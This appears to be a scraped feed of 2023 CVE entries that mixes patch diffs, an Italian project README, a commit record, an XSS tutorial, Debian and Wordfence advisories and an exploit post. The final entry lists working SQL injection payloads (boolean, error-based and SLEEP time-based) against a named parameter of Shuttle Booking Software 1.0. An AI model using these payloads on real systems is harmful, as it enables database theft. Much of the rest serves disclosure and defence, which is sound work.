 SQL Injection in GitHub repository mintplex-labs/anything-llm prior to 0.0.1.

Expand Up @@ -13,6 +13,7 @@ const { const { validatedRequest } \= require("../utils/middleware/validatedRequest"); const { SystemSettings } \= require("../models/systemSettings"); const { Telemetry } \= require("../models/telemetry"); const { escape } \= require("sqlstring-sqlite"); const { handleUploads } \= setupMulter();  
function workspaceEndpoints(app) { Expand Down Expand Up @@ -44,8 +45,8 @@ function workspaceEndpoints(app) { const { slug \= null } \= request.params; const data \= reqBody(request); const currWorkspace \= multiUserMode(response) ? await Workspace.getWithUser(user, \`slug = '${slug}'\`) : await Workspace.get(\`slug = '${slug}'\`); ? await Workspace.getWithUser(user, \`slug = ${escape(slug)}\`) : await Workspace.get(\`slug = ${escape(slug)}\`);  
if (!currWorkspace) { response.sendStatus(400).end(); Expand Down Expand Up @@ -105,8 +106,8 @@ function workspaceEndpoints(app) { const { slug \= null } \= request.params; const { adds \= \[\], deletes \= \[\] } \= reqBody(request); const currWorkspace \= multiUserMode(response) ? await Workspace.getWithUser(user, \`slug = '${slug}'\`) : await Workspace.get(\`slug = '${slug}'\`); ? await Workspace.getWithUser(user, \`slug = ${escape(slug)}\`) : await Workspace.get(\`slug = ${escape(slug)}\`);  
if (!currWorkspace) { response.sendStatus(400).end(); Expand All @@ -115,7 +116,9 @@ function workspaceEndpoints(app) {  
await Document.removeDocuments(currWorkspace, deletes); await Document.addDocuments(currWorkspace, adds); const updatedWorkspace \= await Workspace.get(\`slug = '${slug}'\`); const updatedWorkspace \= await Workspace.get( \`id = ${currWorkspace.id}\` ); response.status(200).json({ workspace: updatedWorkspace }); } catch (e) { console.log(e.message, e); Expand All @@ -133,8 +136,8 @@ function workspaceEndpoints(app) { const user \= await userFromSession(request, response); const VectorDb \= getVectorDbClass(); const workspace \= multiUserMode(response) ? await Workspace.getWithUser(user, \`slug = '${slug}'\`) : await Workspace.get(\`slug = '${slug}'\`); ? await Workspace.getWithUser(user, \`slug = ${escape(slug)}\`) : await Workspace.get(\`slug = ${escape(slug)}\`);  
if (!workspace) { response.sendStatus(400).end(); Expand All @@ -151,7 +154,7 @@ function workspaceEndpoints(app) { } }  
await Workspace.delete(\`slug = '${slug.toLowerCase()}'\`); await Workspace.delete(\`id = ${Number(workspace.id)}\`); await DocumentVectors.deleteForWorkspace(workspace.id); await Document.delete(\`workspaceId = ${Number(workspace.id)}\`); await WorkspaceChats.delete(\`workspaceId = ${Number(workspace.id)}\`); Expand Down Expand Up @@ -187,8 +190,8 @@ function workspaceEndpoints(app) { const { slug } \= request.params; const user \= await userFromSession(request, response); const workspace \= multiUserMode(response) ? await Workspace.getWithUser(user, \`slug = '${slug}'\`) : await Workspace.get(\`slug = '${slug}'\`); ? await Workspace.getWithUser(user, \`slug = ${escape(slug)}\`) : await Workspace.get(\`slug = ${escape(slug)}\`);  
response.status(200).json({ workspace }); } catch (e) { Expand All @@ -205,8 +208,8 @@ function workspaceEndpoints(app) { const { slug } \= request.params; const user \= await userFromSession(request, response); const workspace \= multiUserMode(response) ? await Workspace.getWithUser(user, \`slug = '${slug}'\`) : await Workspace.get(\`slug = '${slug}'\`); ? await Workspace.getWithUser(user, \`slug = ${escape(slug)}\`) : await Workspace.get(\`slug = ${escape(slug)}\`);  
if (!workspace) { response.sendStatus(400).end(); Expand Down

CVE-2023-4899: patch SQL injection opportunities [LOW RISK] (#234) · Mintplex-Labs/anything-llm@dc3dfbf

A reflected cross-site scripting (XSS) vulnerability in DevCode OpenSTAManager versions 2.4.24 to 2.4.47 may allow a remote attacker to execute arbitrary JavaScript in the web browser of a victim by injecting a malicious payload into the 'error' and 'error_description' parameters of 'oauth2.php'.

    

Il gestionale OpenSTAManager è un software open-source e web based, sviluppato dall'azienda informatica DevCode di Este per gestire ed archiviare il servizio di assistenza tecnica e la relativa fatturazione. Il nome del progetto deriva dalla parziale traduzione in inglese degli elementi principali che lo compongono: la natura open-source e il suo obiettivo quale Gestore del Servizio Tecnico di Assistenza.

Un software gestionale, identificato nell'insieme degli applicativi che automatizzano i processi di gestione all'interno delle aziende, appartiene solitamente a una specifica categoria del settore, specializzata negli ambiti di:

*   Gestione della contabilità;
*   Gestione del magazzino;
*   Gestione e ausilio della produzione;
*   Gestione e previsione dei budget aziendali;
*   Gestione ed analisi finanziaria.

Secondo questa definizione, OpenSTAManager riesce a generalizzare al proprio interno le funzionalità caratteristiche della contabilità e della gestione del magazzino, presentando inoltre moduli piuttosto avanzati e destinati a complementare l'attività aziendale in relazione agli interventi di assistenza della realtà lavorativa in oggetto.

La documentazione ufficiale è disponibile all'indirizzo https://docs.openstamanager.com/.

*   Requisiti
*   Installazione
    *   Versioni
    *   Build
    *   Strumenti di sviluppo e debug
*   Perché software open-source
*   Community
*   Contribuire
*   Sviluppatori
*   Licenza

**Requisiti**

L'installazione del gestionale richiede la presenza di un server web con abilitato il DBMS MySQL e il linguaggio di programmazione PHP.

PHP

EOL

Supportato

8.1

25/11/2024

❌

8.0

26/11/2023

✔️

7.4

28/11/2022

✔️

7.3

06/12/2021

✔️

7.2

30/11/2020

❌

MYSQL

EOL

Supportato

8.0

01/04/2026

✔️

5.7

21/10/2023

✔️

5.6

05/02/2021

❌

Per ulteriori informazioni sui pacchetti che forniscono questi elementi di default, visitare la sezione Installazione della documentazione.

**Installazione rapida**

git clone https://github.com/devcode-it/openstamanager.git
cd openstamanager

# Download di composer da https://getcomposer.org/download/

yarn develop-OSM

**Installazione**

Per procedere all'installazione è necessario seguire i seguenti punti:

1.  Scaricare una release ufficiale del progetto.
    
2.  Creare una cartella (ad esempio openstamanager) nella root del server web installato ed estrarvi il contenuto della release scaricata. Il percorso della cartella root del server varia in base al software in utilizzo:
    
    *   LAMP (/var/www/html)
    *   XAMPP (C:/xampp/htdocs per Windows, /opt/lampp/htdocs/ per Linux, /Applications/XAMPP/htdocs/ per MAC)
    *   WAMP (C:\wamp\www)
    *   MAMP (C:\MAMP\htdocs per Windows, /Applications/MAMP/htdocs per MAC)
3.  Creare un database vuoto (tramite PHPMyAdmin o riga di comando).
    
4.  Accedere a http://localhost/openstamanager dal vostro browser.
    
5.  Inserire i dati di configurazione per collegarsi al database.
    
6.  Procedere all'installazione del software, cliccando sul pulsante **Installa**.
    

**Attenzione**: è possibile che l'installazione richieda del tempo. Si consiglia pertanto di attendere almeno qualche minuto senza alcun cambiamento nella pagina di installazione (in particolare, della progress bar presente) prima di cercare una possibile soluzione nelle discussioni del forum o nella sezione dedicata.

**Versioni**

Per mantenere un elevato grado di trasparenza riguardo al ciclo delle release, seguiamo le linee guida Semantic Versioning (SemVer) per definire le versioni del progetto. Per vedere tutte le versioni disponibili al download, visitare la pagina relativa su GitHub (per versioni precedenti alla 2.3, visitare SourceForge).

Nel caso utilizziate il programma per uso commerciale, si consiglia di scaricare le release disponibili nel sito ufficiale del progetto (https://www.openstamanager.com), evitando di utilizzare direttamente il codice della repository. Se siete inoltre interessati a supporto e assistenza professionali, li potete richiedere nella sezione dedicata.

**Build**

Nel caso si stia utilizzando la versione direttamente ottenuta dalla repository di GitHub, è necessario eseguire i seguenti comandi da linea di comando per completare le dipendenze PHP (tramite Composer) e gli assets (tramite Yarn) del progetto.

php composer.phar install
yarn global add gulp
yarn install
gulp

In alternativa alla sequenza di comandi precedente, è possibile utilizzare il seguente comando (richiede l'installazione di GIT e Yarn, oltre che l'inserimento dell'archivio composer.phar nella cartella principale del progetto):

Per ulteriori informazioni, visitare le sezioni Assets e Framework della documentazione.

**Strumenti di sviluppo e debug**

Consigliamo di installare psalm e configurarlo nel proprio IDE se supportato, in modo che vengano eseguiti ulteriori controlli automatici sul codice scritto.

E' già configurato su **composer** l'inclusione di PHP-CS-Fixer, uno strumento che permette di formattare in modo uniforme il codice scritto. Si può configurare nel proprio IDE se supportato. Il percorso dell'eseguibile è vendor/bin/php-cs-fixer.

**Perché software open-source**

Il progetto è un software open-source perché permette agli utilizzatori di studiarne il funzionamento ed adattarlo alle proprie esigenze; inoltre, in ambito commerciale, non obbliga l'utilizzatore ad essere legato allo stesso fornitore di assistenza.

In questo modo è possibile ottenere un'ulteriore garanzia sul funzionamento del software, poiché chiunque ne abbia le capacità può verificarlo, escludendo mancanze in relazione alla sicurezza e alla privacy dei dati (caratteristica che il software proprietario non può offrire).

**Community**

La community è una componente importante in un progetto open-source, perché mette in contatto utenti e programmatori tra di loro e permette pertanto l'individuazione di soluzioni innovative e migliori.

Siamo presenti su Facebook, Twitter, YouTube e Mastodon e il nostro forum ufficiale è disponibile all'indirizzo https://forum.openstamanager.com, dove potete segnalare i vostri problemi e soddisfare le vostre curiosità nelle sezioni più adeguate.

**Contribuire**

Per poter contribuire ed eseguire i test automatici, si consiglia di seguire le indicazioni descritte all'interno della documentazione ufficiale.

Se volete contribuire attivamente con semplici migliorie o correzioni potete cercare tra le issue per i nuovi contributori.

**Bounty Program**

Potresti trovare degli issue contrassegnati con il label **bountysource**. Questo significa che è disponibile una ricompensa per chi risolverà l'issue secondo i criteri descritti all'interno. Devi creare innanzitutto un account su BountySource.com. Successivamente, il funzionamento sarà il seguente:

*   esegui un fork del repository
*   risolvi l'issue
*   invia una pull request

Verificheremo se la pull request soddisferà i requisiti e, una volta approvata, provvederemo ad accreditare la ricompensa nel tuo account di BountySource.

**Licenza**

Questo progetto è tutelato dalla licenza **GPL 3**.

CVE-2023-38878: GitHub - devcode-it/openstamanager: Il software gestionale open source per l'assistenza tecnica e la fatturazione

In bindSelection of DatabaseUtils.java, there is a possible way to access files from other applications due to SQL injection. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

)\]}' { "commit": "23d156ed1bed6d2c2b325f0be540d0afca510c49", "tree": "f54e4f4739f4a720de25255369dd018bae3b8a54", "parents": \[ "192c7711c1adc835c06720d59ddacb86c5e32b5f" \], "author": { "name": "Krishang Garodia", "email": "krishang@google.com", "time": "Mon Jun 19 11:43:45 2023 +0000" }, "committer": { "name": "Android Build Coastguard Worker", "email": "android-build-coastguard-worker@google.com", "time": "Fri Jul 14 17:32:33 2023 +0000" }, "message": "Remove invalid surrogates during bindSelection\\n\\nTest: atest MediaProviderTests\\nBug: 223793631\\n(cherry picked from https://googleplex-android-review.googlesource.com/q/commit:108f736d0ec6e974c3f947e7e568845b7e039a0a)\\n(cherry picked from https://googleplex-android-review.googlesource.com/q/commit:a48b01f78f28fc642b144c673bfcd12ae78c5a73)\\nMerged-In: I18b879f1a51394b4739225ec88b862fd6d0d5526\\nChange-Id: I18b879f1a51394b4739225ec88b862fd6d0d5526\\n", "tree\_diff": \[ { "type": "modify", "old\_id": "55efafc7f79911ea4d1a6e57b01d745c277aaf4a", "old\_mode": 33188, "old\_path": "src/com/android/providers/media/util/DatabaseUtils.java", "new\_id": "53ecf964eef6d0a075c3af85a713744decb648f9", "new\_mode": 33188, "new\_path": "src/com/android/providers/media/util/DatabaseUtils.java" }, { "type": "modify", "old\_id": "685d897041ef04ba469574150494f0b0c1ed316d", "old\_mode": 33188, "old\_path": "tests/src/com/android/providers/media/util/DatabaseUtilsTest.java", "new\_id": "a907875898476236c1f5de7e25812fdf928509a1", "new\_mode": 33188, "new\_path": "tests/src/com/android/providers/media/util/DatabaseUtilsTest.java" } \] }

CVE-2023-35683

Sourcecodester Doctor Appointment System 1.0 is vulnerable to SQL Injection in the variable $userid at doctors\myDetails.php.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-40945: vulnerability-report/Doctormms_CVE-2023-40945 at main · KLSEHB/vulnerability-report

Schoolmate 1.3 is vulnerable to SQL Injection in the variable $schoolname from Database at ~\header.php.

CVE-2023-40944: vulnerability-report/Schoolmate_CVE-2023-40944 at main · KLSEHB/vulnerability-report

Schoolmate 1.3 is vulnerable to SQL Injection in the variable $username from SESSION in ValidateLogin.php.

CVE-2023-40946: vulnerability-report/Schoolmate_CVE-2023-40946 at main · KLSEHB/vulnerability-report

Multiple cross-site scripting (XSS) vulnerabilities in Dairy Farm Shop Management System Using PHP and MySQL v1.1 allow attackers to execute arbitrary web scripts and HTML via a crafted payload injected into the Category and Category Field parameters.

In this section, we'll explain what cross-site scripting is, describe the different varieties of cross-site scripting vulnerabilities, and spell out how to find and prevent cross-site scripting.

**What is cross-site scripting (XSS)?**

Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

**How does XSS work?**

Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to users. When the malicious code executes inside a victim's browser, the attacker can fully compromise their interaction with the application.

**Labs**

If you're already familiar with the basic concepts behind XSS vulnerabilities and just want to practice exploiting them on some realistic, deliberately vulnerable targets, you can access all of the labs in this topic from the link below.

*   View all XSS labs

**XSS proof of concept**

You can confirm most kinds of XSS vulnerability by injecting a payload that causes your own browser to execute some arbitrary JavaScript. It's long been common practice to use the alert() function for this purpose because it's short, harmless, and pretty hard to miss when it's successfully called. In fact, you solve the majority of our XSS labs by invoking alert() in a simulated victim's browser.

Unfortunately, there's a slight hitch if you use Chrome. From version 92 onward (July 20th, 2021), cross-origin iframes are prevented from calling alert(). As these are used to construct some of the more advanced XSS attacks, you'll sometimes need to use an alternative PoC payload. In this scenario, we recommend the print() function. If you're interested in learning more about this change and why we like print(), check out our blog post on the subject.

As the simulated victim in our labs uses Chrome, we've amended the affected labs so that they can also be solved using print(). We've indicated this in the instructions wherever relevant.

**What are the types of XSS attacks?**

There are three main types of XSS attacks. These are:

*   Reflected XSS, where the malicious script comes from the current HTTP request.
*   Stored XSS, where the malicious script comes from the website's database.
*   DOM-based XSS, where the vulnerability exists in client-side code rather than server-side code.

**Reflected cross-site scripting**

Reflected XSS is the simplest variety of cross-site scripting. It arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Here is a simple example of a reflected XSS vulnerability:

https://insecure-website.com/status?message=All+is+well.
<p>Status: All is well.</p>

The application doesn't perform any other processing of the data, so an attacker can easily construct an attack like this:

https://insecure-website.com/status?message=<script>/*+Bad+stuff+here...+*/</script>
<p>Status: <script>/* Bad stuff here... */</script></p>

If the user visits the URL constructed by the attacker, then the attacker's script executes in the user's browser, in the context of that user's session with the application. At that point, the script can carry out any action, and retrieve any data, to which the user has access.

**Stored cross-site scripting**

Stored XSS (also known as persistent or second-order XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.

The data in question might be submitted to the application via HTTP requests; for example, comments on a blog post, user nicknames in a chat room, or contact details on a customer order. In other cases, the data might arrive from other untrusted sources; for example, a webmail application displaying messages received over SMTP, a marketing application displaying social media posts, or a network monitoring application displaying packet data from network traffic.

Here is a simple example of a stored XSS vulnerability. A message board application lets users submit messages, which are displayed to other users:

<p>Hello, this is my message!</p>

The application doesn't perform any other processing of the data, so an attacker can easily send a message that attacks other users:

<p><script>/* Bad stuff here... */</script></p>

**DOM-based cross-site scripting**

DOM-based XSS (also known as DOM XSS) arises when an application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.

In the following example, an application uses some JavaScript to read the value from an input field and write that value to an element within the HTML:

var search = document.getElementById('search').value;
var results = document.getElementById('results');
results.innerHTML = 'You searched for: ' + search;

If the attacker can control the value of the input field, they can easily construct a malicious value that causes their own script to execute:

You searched for: <img src=1 onerror='/* Bad stuff here... */'>

In a typical case, the input field would be populated from part of the HTTP request, such as a URL query string parameter, allowing the attacker to deliver an attack using a malicious URL, in the same manner as reflected XSS.

**What can XSS be used for?**

An attacker who exploits a cross-site scripting vulnerability is typically able to:

*   Impersonate or masquerade as the victim user.
*   Carry out any action that the user is able to perform.
*   Read any data that the user is able to access.
*   Capture the user's login credentials.
*   Perform virtual defacement of the web site.
*   Inject trojan functionality into the web site.

**Impact of XSS vulnerabilities**

The actual impact of an XSS attack generally depends on the nature of the application, its functionality and data, and the status of the compromised user. For example:

*   In a brochureware application, where all users are anonymous and all information is public, the impact will often be minimal.
*   In an application holding sensitive data, such as banking transactions, emails, or healthcare records, the impact will usually be serious.
*   If the compromised user has elevated privileges within the application, then the impact will generally be critical, allowing the attacker to take full control of the vulnerable application and compromise all users and their data.

**How to find and test for XSS vulnerabilities**

The vast majority of XSS vulnerabilities can be found quickly and reliably using Burp Suite's web vulnerability scanner.

Manually testing for reflected and stored XSS normally involves submitting some simple unique input (such as a short alphanumeric string) into every entry point in the application, identifying every location where the submitted input is returned in HTTP responses, and testing each location individually to determine whether suitably crafted input can be used to execute arbitrary JavaScript. In this way, you can determine the context in which the XSS occurs and select a suitable payload to exploit it.

Manually testing for DOM-based XSS arising from URL parameters involves a similar process: placing some simple unique input in the parameter, using the browser's developer tools to search the DOM for this input, and testing each location to determine whether it is exploitable. However, other types of DOM XSS are harder to detect. To find DOM-based vulnerabilities in non-URL-based input (such as document.cookie) or non-HTML-based sinks (like setTimeout), there is no substitute for reviewing JavaScript code, which can be extremely time-consuming. Burp Suite's web vulnerability scanner combines static and dynamic analysis of JavaScript to reliably automate the detection of DOM-based vulnerabilities.

**Content security policy**

Content security policy (CSP) is a browser mechanism that aims to mitigate the impact of cross-site scripting and some other vulnerabilities. If an application that employs CSP contains XSS-like behavior, then the CSP might hinder or prevent exploitation of the vulnerability. Often, the CSP can be circumvented to enable exploitation of the underlying vulnerability.

**Dangling markup injection**

Dangling markup injection is a technique that can be used to capture data cross-domain in situations where a full cross-site scripting exploit is not possible, due to input filters or other defenses. It can often be exploited to capture sensitive information that is visible to other users, including CSRF tokens that can be used to perform unauthorized actions on behalf of the user.

**How to prevent XSS attacks**

Preventing cross-site scripting is trivial in some cases but can be much harder depending on the complexity of the application and the ways it handles user-controllable data.

In general, effectively preventing XSS vulnerabilities is likely to involve a combination of the following measures:

*   **Filter input on arrival.** At the point where user input is received, filter as strictly as possible based on what is expected or valid input.
*   **Encode data on output.** At the point where user-controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, JavaScript, and CSS encoding.
*   **Use appropriate response headers.** To prevent XSS in HTTP responses that aren't intended to contain any HTML or JavaScript, you can use the Content-Type and X-Content-Type-Options headers to ensure that browsers interpret the responses in the way you intend.
*   **Content Security Policy.** As a last line of defense, you can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.

**Common questions about cross-site scripting**

**How common are XSS vulnerabilities?** XSS vulnerabilities are very common, and XSS is probably the most frequently occurring web security vulnerability.

**How common are XSS attacks?** It is difficult to get reliable data about real-world XSS attacks, but it is probably less frequently exploited than other vulnerabilities.

**What is the difference between XSS and CSRF?** XSS involves causing a web site to return malicious JavaScript, while CSRF involves inducing a victim user to perform actions they do not intend to do.

**What is the difference between XSS and SQL injection?** XSS is a client-side vulnerability that targets other application users, while SQL injection is a server-side vulnerability that targets the application's database.

**How do I prevent XSS in PHP?** Filter your inputs with a whitelist of allowed characters and use type hints or type casting. Escape your outputs with htmlentities and ENT_QUOTES for HTML contexts, or JavaScript Unicode escapes for JavaScript contexts.

**How do I prevent XSS in Java?** Filter your inputs with a whitelist of allowed characters and use a library such as Google Guava to HTML-encode your output for HTML contexts, or use JavaScript Unicode escapes for JavaScript contexts.

CVE-2023-41593: What is cross-site scripting (XSS) and how to prevent it? | Web Security Academy

Debian Linux Security Advisory 5495-1 - Multiple vulnerabilities were discovered in frr, the FRRouting suite of internet protocols, while processing malformed requests and packets the BGP daemon may have reachable assertions, NULL pointer dereference, out-of-bounds memory access, which may lead to denial of service attack.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5495-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuSeptember 11, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : frrCVE ID         : CVE-2022-36440 CVE-2022-40302 CVE-2022-40318 CVE-2022-43681                  CVE-2023-31490 CVE-2023-38802 CVE-2023-41358Debian Bug     : 1035829 1036062Brief introduction Multiple vulnerbilities were discovered in frr, the FRRouting suite ofinternet protocols, while processing malformed requests and packets the BGPdaemon may have reachable assertions, NULL pointer dereference, out-of-boundsmemory access, which may lead to denial of service attack.For the oldstable distribution (bullseye), these problems have been fixedin version 7.5.1-1.1+deb11u2.For the stable distribution (bookworm), these problems have been fixed inversion 8.4.4-1.1~deb12u1.We recommend that you upgrade your frr packages.For the detailed security status of frr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/frrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmT+vCQACgkQO1LKKgqv2VTdlwf9Ez2k1hBPYWNge7Izunc6ovIAEeDkSLjAFYU/sEn8ehb2KQAvU27AxtxD0sYhV1XFD0y8gqQIngSgpVD+XKvclPTihS8h48Yx+C3M2e1ce5SnDytvM4AZ9w7fmaHvbysQL1QrKB4TyIr3jnikcMIWgwyzaRTmIpqryFabO44SSSe+Ysn8Mvdbh3p5Zzb9Udm/5iZWybYVO4aO0fndrq8TnfNe9uJCKd6MjUR/0Byppzmzt5lUm8PoW4wuxIgwpy9hXXCUD/ttQztKeK2FScQbz1xSNz6RdomyzDK+dVZ+BnihPUNWECweH9UAm8laSkRR1QzCOEjVGB6pcIge0IKl/w===t+W8-----END PGP SIGNATURE-----

Debian Security Advisory 5495-1

WordPress Slimstat Analytics plugin versions 5.0.9 and below suffer from cross site scripting and remote SQL injection vulnerabilities.

    Vulnerability Summary from Wordfence IntelligenceDescription: Slimstat Analytics <= 5.0.9 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Affected Plugin: Slimstat AnalyticsPlugin Slug: wp-slimstatAffected Versions: <= 5.0.9CVE ID: CVE-2023-4597CVSS Score: 6.4 (Medium)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:NResearcher/s: Lana Codes Fully Patched Version: 5.0.10The Slimstat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘slimstat’ shortcode in versions up to, and including, 5.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.Description: Slimstat Analytics <= 5.0.9 – Authenticated (Contributor+) Blind SQL Injection via Shortcode Affected Plugin: Slimstat AnalyticsPlugin Slug: wp-slimstatAffected Versions: <= 5.0.9CVE ID: CVE-2023-4598CVSS Score: 8.8 (High)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:HResearcher/s: Lana Codes Fully Patched Version: 5.0.10The Slimstat Analytics plugin for WordPress is vulnerable to SQL Injection via the plugin’s shortcode in versions up to, and including, 5.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.Technical AnalysisSlimstat Analytics is a WordPress website traffic analytics plugin that offers several features for analyzing and monitoring traffic. It provides a shortcode ([slimstat]) that displays various types of statistics when added to a WordPress page or post.Unfortunately, insecure implementation of the plugin’s shortcode functionality allows for the injection of arbitrary web scripts into these pages. Examining the code reveals that the shortcode has several types based on the ‘f’ parameter. In vulnerable versions, the ‘top-all’ type does not adequately sanitize the user-supplied ‘w’ attribute, and then fails to escape the ‘class’ output derived from the ‘w’ parameter when it displays the statistics. This makes it possible to inject attribute-based Cross-Site Scripting payloads via the ‘w’ attribute.[View this code snippet on the blog.] This makes it possible for threat actors with contributor-level access to a site to carry out stored XSS attacks. Once a script is injected into a page or post, it will execute each time a user accesses the affected page. While this vulnerability does require that a trusted contributor account is compromised, or that a user be able to register as a contributor, successful threat actors could steal sensitive information, manipulate site content, inject administrative users, edit files, or redirect users to malicious websites which are all severe consequences.Further examining the code, we also found a SQL Injection vulnerability within the same shortcode. Although the ‘w’ parameter will be converted into an array, it is not properly sanitized. This parameter is used for the column in the database query, and although the prepare function is used, the column is not specified as a placeholder, which makes it possible for an attacker to perform SQL injection attacks.[View this code snippet on the blog.] Since no data from the SQL query was returned in the response, an attacker would need to use a Time-Based blind approach to extract information from the database. This means that they would need to use SQL CASE statements along with the SLEEP() command while observing the response time of each request to steal information from the database. This is an intricate, yet frequently successful method to obtain information from a database when exploiting SQL Injection vulnerabilities.Disclosure TimelineAugust 24, 2023 – Wordfence Threat Intelligence team discovers the stored XSS and SQL Injection vulnerabilities in Slimstat Analytics.August 24, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.August 26, 2023 – The vendor confirms the inbox for handling the discussion.August 26, 2023 – We send over the full disclosure details for the XSS vulnerability.August 27, 2023 – We send over the full disclosure details for the SQL injection vulnerability.August 27, 2023 – The vendor acknowledges the report and begins working on a fix.August 28, 2023 – The fully patched version, 5.0.10, is released.ConclusionIn this blog post, we have detailed stored XSS and SQL Injection vulnerabilities within the Slimstat Analytics plugin affecting versions 5.0.9 and earlier. This vulnerability allows authenticated threat actors with contributor-level permissions or higher to inject malicious web scripts into pages that execute when a user accesses an affected page, and extract sensitive information from a database. These vulnerabilities have been fully addressed in version 5.0.10 of the plugin.We encourage WordPress users to verify that their sites are updated to the latest patched version of Slimstat Analytics.All Wordfence users, including those running Wordfence Premium, Wordfence Care, and Wordfence Response, as well as sites still running the free version of Wordfence, are fully protected against this vulnerability.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

WordPress Slimstat Analytics 5.0.9 Cross Site Scripting / SQL Injection

Shuttle Booking Software version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    ## Title: Shuttle-Booking-Software-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 09/10/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/shuttle-booking-software/#sectionPricing## Reference: https://portswigger.net/web-security/sql-injection## Description:The location_id parameter appears to be vulnerable to SQL injectionattacks. A single quote was submitted in the location_id parameter,and a database error message was returned. Two single quotes were thensubmitted and the error message disappeared.The attacker easily can steal all information from the database ofthis web application!WARNING! All of you: Be careful what you buy! This will be your responsibility!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: location_id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')AND 1347=1347 AND ('MVss'='MVss&traveling=from    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (GTID_SUBSET)    Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT(ELT(9416=9416,1))),0x71706b7071),9416) AND('dOqc'='dOqc&traveling=from    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND('EEYQ'='EEYQ&traveling=from---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Shuttle-Booking-Software-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/shuttle-booking-software-10-multiple.html)## Time spent:01:47:00

Tag

#sql